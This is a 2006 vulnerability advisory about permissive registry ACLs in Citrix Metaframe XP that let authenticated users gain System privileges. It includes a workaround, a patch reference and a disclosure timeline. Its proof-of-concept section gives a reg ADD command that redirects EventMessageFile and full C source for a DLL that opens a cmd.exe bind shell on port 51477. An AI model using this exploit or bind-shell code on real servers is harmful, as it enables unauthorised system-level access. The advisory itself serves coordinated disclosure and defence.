#SIAADV-06-003 -CITRIX METAFRAME XP - permissive ACLS allows privilege escalation -------------------------------------------------------------------------------- Author: Andres Tarasco acuña ( atarasco @ sia.es ) Vendor: Citrix- http://www.citrix.com Impact: Local Privilege escalation Advisory: http://www.514.es Affected application -------------------- - Citrix Metaframe 1.8 - Citrix Metaframe Presentation server 3.0 - Citrix Presentation server 4.0 Affected versions -------------------- - Metaframe XP Servers <= v1.0 Feature Release - Metaframe XP updated from old releases Technical Details: ------------------ While performing some security tests against several Citrix Metaframe servers, a potential security issue was found, due to permissive ACLS. By default, access rigthts over the following registry key HKLM\system\Currentcontrolset\ Services\Eventlog\Application\MetaframeEvents grants write access to authenticated users. Over that key there are two registry entries, CategoryMessageFile and EventMessageFile that points to the citrix event handling library, which is by default stored at %systemroot%\System32\MFEvent.dll This library is used by eventlog service. It’s possible for an authenticated user to modify the path of the library in the registry, pointing to an special crafted library that when loaded will execute arbitrary code with System privileges. This flaw allows authenticated users to elevate privileges over a metaframe server. Workaround: ----------- Use regedt32.exe to restrict permissions by granting read only permissions to all not administrator accounts. Hive: HKLM\system\Currentcontrolset\Services\Eventlog\Application\MetaframeEvents Patch: -------- Citrix has released a security bulletin that address this vulnerability: http://support.citrix.com/article/CTX110492 Related patches can also be downloaded from http://support.citrix.com/hotfixes.jsp Proof of concept: ----------------- Compile the following library (as poc.dll) and change the EventMessageFile registry key: c:\>reg ADD HKLM\system\Currentcontrolset\Services\Eventlog\Application\MetaframeEvents /v EventMessageFile /t REG_EXPAND_SZ /d c:\winnt\tasks\poc.dll /* Bindshell library for testing Citrix Metaframe code execution */ // #include "stdafx.h" #include #include #pragma comment (lib,"ws2_32") #define SIATIGERTEAM 51477 int BindShell(void *foo) { //Bind Shell. POrt 51477 SOCKET s,s2; STARTUPINFO si; PROCESS_INFORMATION pi; WSADATA HWSAdata; struct sockaddr_in sa; int len; if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { return(-1);} if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ return(-1); } sa.sin_family = AF_INET; sa.sin_port = (USHORT)htons(SIATIGERTEAM); sa.sin_addr.s_addr = htonl(INADDR_ANY); len=sizeof(sa); if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); } if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); } while (1) { s2 = accept(s,(struct sockaddr *)&sa,&len); //closesocket(s); ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) ); si.cb = sizeof(si); si.wShowWindow = SW_HIDE; si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; si.hStdInput = (void *) s2; // SOCKET si.hStdOutput = (void *) s2; si.hStdError = (void *) s2; if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) { return(-1); } WaitForSingleObject( pi.hProcess, INFINITE ); closesocket(s2); } //closesocket(s2); // printf("SALIMOS...\n"); Sleep(5000); return(1); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ DWORD i; switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)BindShell, 0, 0, &i); break; case DLL_PROCESS_DETACH: default: return FALSE; } return(TRUE); } Timeline: --------- June 9, 2006 - Vulnerability discovered June 11, 2006 - Vendor notified June 12, 2006 - First Vendor response July 18, 2006 - Fix released by Citrix July 18, 2006 - Public disclosure